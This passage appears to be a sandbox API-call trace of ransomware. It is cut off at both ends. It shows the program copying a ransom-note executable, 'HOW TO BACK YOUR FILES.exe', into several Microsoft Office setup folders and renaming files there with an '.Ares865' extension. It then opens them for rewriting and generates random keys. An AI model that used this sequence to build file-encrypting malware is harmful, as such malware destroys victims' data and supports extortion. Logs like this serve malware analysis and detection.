back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.229] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.229] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ef03180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ef03180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.229] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.229] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.229] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.Ares865") returned 116 [0076.229] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.ares865"), dwFlags=0x1) returned 1 [0076.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3186) returned 1 [0076.230] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.231] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.231] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.233] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.234] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.234] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.234] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.Ares865") returned 111 [0076.234] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.236] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4207) returned 1 [0076.236] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.237] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.237] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.239] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.240] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.240] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.240] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us" [0076.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3193b0 | out: hHeap=0x2b0000) returned 1 [0076.241] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0076.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us") returned 93 [0076.241] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us" [0076.241] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.241] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.246] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.246] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ef292e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ef292e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.246] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.246] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.246] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.Ares865") returned 116 [0076.246] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.ares865"), dwFlags=0x1) returned 1 [0076.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.247] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1606) returned 1 [0076.247] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.248] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.248] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.250] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.251] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.251] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.251] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.Ares865") returned 111 [0076.251] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.253] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1988) returned 1 [0076.253] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.253] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.253] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.255] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.256] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.256] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.256] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW" [0076.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f088 | out: hHeap=0x2b0000) returned 1 [0076.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0076.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW") returned 91 [0076.257] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW" [0076.257] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.257] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.260] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.261] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ef4f440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ef4f440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.261] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.Ares865") returned 114 [0076.261] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.ares865"), dwFlags=0x1) returned 1 [0076.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4274) returned 1 [0076.262] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.263] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.263] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.265] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.266] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.266] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.266] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us" [0076.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3192e8 | out: hHeap=0x2b0000) returned 1 [0076.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0076.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us") returned 94 [0076.266] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us" [0076.266] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.266] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.272] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.272] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ef755a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ef755a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.272] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.272] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.273] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.Ares865") returned 118 [0076.273] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.ares865"), dwFlags=0x1) returned 1 [0076.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.274] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1383) returned 1 [0076.274] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.275] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.275] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.279] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.280] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.280] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.280] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.Ares865") returned 112 [0076.280] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.281] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2362) returned 1 [0076.281] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.282] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.282] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.284] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.285] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.285] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.285] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us" [0076.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319220 | out: hHeap=0x2b0000) returned 1 [0076.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0076.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us") returned 92 [0076.285] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us" [0076.285] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.285] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.290] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.290] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ef9b700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ef9b700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.290] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.290] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.291] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.Ares865") returned 113 [0076.291] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup 